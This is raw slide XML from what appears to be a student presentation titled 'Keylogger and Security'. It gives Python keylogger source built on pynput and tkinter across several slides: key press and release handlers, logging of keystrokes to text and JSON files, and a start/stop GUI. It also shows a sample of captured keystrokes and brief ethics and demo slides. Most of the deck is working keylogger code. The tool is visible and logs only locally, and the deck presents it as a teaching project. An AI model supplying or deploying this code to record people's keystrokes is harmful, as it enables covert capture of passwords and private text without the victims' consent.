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70" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="273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6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25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08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23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5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75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3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9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8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3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9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49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7CC99-F499-4BD5-8DB1-F22B70FD90E1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90838D-F70F-4679-847F-FBECA980B3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7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429" y="430823"/>
            <a:ext cx="7766936" cy="1861551"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>NAME:NUJELLA RAVINDRA KUMAR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429" y="3209193"/>
            <a:ext cx="7766936" cy="183303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TITLE:KEYLOGGER AND SECURITY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4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31477" y="111166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on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Pressed': f'{key}'}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flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Held': f'{key}'}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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used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0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9962" y="1210886"/>
            <a:ext cx="61897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on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used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    keys = keys + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(keys))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279855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5485" y="1148846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start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>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listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(text="[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(state='disabled')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stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(state='normal')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3431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239" y="54250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root = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Tk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.pack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start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>("250x250")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>root.mainloop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51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01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RESULT OF KET LOGGER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949570" y="1725443"/>
            <a:ext cx="788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'w''w''w''.''g''o''o''g''l''e''.''c''o''m'Key.enter'w''w''w''.''w''u''r''l''n''w''e''b''.''c''o''m'Key.ctrl_l't''e''s''t''t''e''s'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>'r'Key.backspace't‘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result is saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in the separate text file in the folder of key logger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45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4096" y="2997294"/>
            <a:ext cx="8134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</a:rPr>
              <a:t>Security and Ethical Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ethical Use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ensure informed consent before monitoring.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keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> responsibly and legally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Security Measures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Protect the recorded data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use for legitimate purposes only.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1352550" y="375700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Demonstration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Running the Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Show a demo of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Start and stop the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> using the GUI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Check the key_log.txt and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> files for recorded keystrokes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13074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5450" y="1594188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Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Recap the key features and functionality of the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Highlight the importance of ethical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32648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2375" y="284196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0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" i="0" dirty="0" smtClean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41492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636" y="1454965"/>
            <a:ext cx="7766936" cy="1646302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accent4"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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98078" y="2428035"/>
            <a:ext cx="7596554" cy="7699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00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TITLE : KEY LOGGER AND SECURITY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9675" y="2099786"/>
            <a:ext cx="8905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rgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>What is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" dirty="0" smtClean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ui-sans-serif"/>
              </a:rPr>
              <a:t>Definition: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> is software that records keystrokes made on a keyboard.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ui-sans-serif"/>
              </a:rPr>
              <a:t>Purpose: Used for monitoring and surveillance, often to capture sensitive information.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1448" y="413211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428BCA"/>
                </a:solidFill>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>AGENDA: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46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7775" y="2238286"/>
            <a:ext cx="1005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rgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>Features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" smtClean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ui-sans-serif"/>
              </a:rPr>
              <a:t>GUI for starting and stopping the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" smtClean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ui-sans-serif"/>
              </a:rPr>
              <a:t>Records keystrokes to a text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ui-sans-serif"/>
              </a:rPr>
              <a:t>Saves keystroke events to a JSON file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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15" y="244610"/>
            <a:ext cx="6267231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19200" y="1270257"/>
            <a:ext cx="8229600" cy="30411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Python Libraries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rgbClr val="0D0D0D"/>
              </a:solidFill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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>     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tkinter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For creating the graphical user interface.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pynput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For capturing keyboard events.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json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: For storing keystrokes in JSON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90775" y="2227987"/>
            <a:ext cx="76866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Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Install Python if not already installed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Install required libraries using pip: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pip install </a:t>
            </a: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pynput</a:t>
            </a:r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1271" y="180982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Variables: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keys_pressed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: List to store keystroke events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>key_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: String to accumulate keystroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s.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081454" y="342897"/>
            <a:ext cx="5264710" cy="938359"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4250" b="1" kern="0" spc="5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PROJECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4250" b="1" kern="0" spc="5" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4250" b="1" kern="0" spc="-20" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OVERVIEW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671270" y="3455377"/>
            <a:ext cx="7177119" cy="2031022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Starting and Stopping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(): Starts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keylogger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pPr lvl="0" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(): Stops the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Updates the GUI buttons and status label accordingly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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2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4656" y="13773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Starting and Stopping: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start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(): Starts the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stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(): Stops the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>keylogger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Updates the GUI buttons and status label accordingly.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59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9977" y="117530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tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>tk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tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>json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keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p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generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
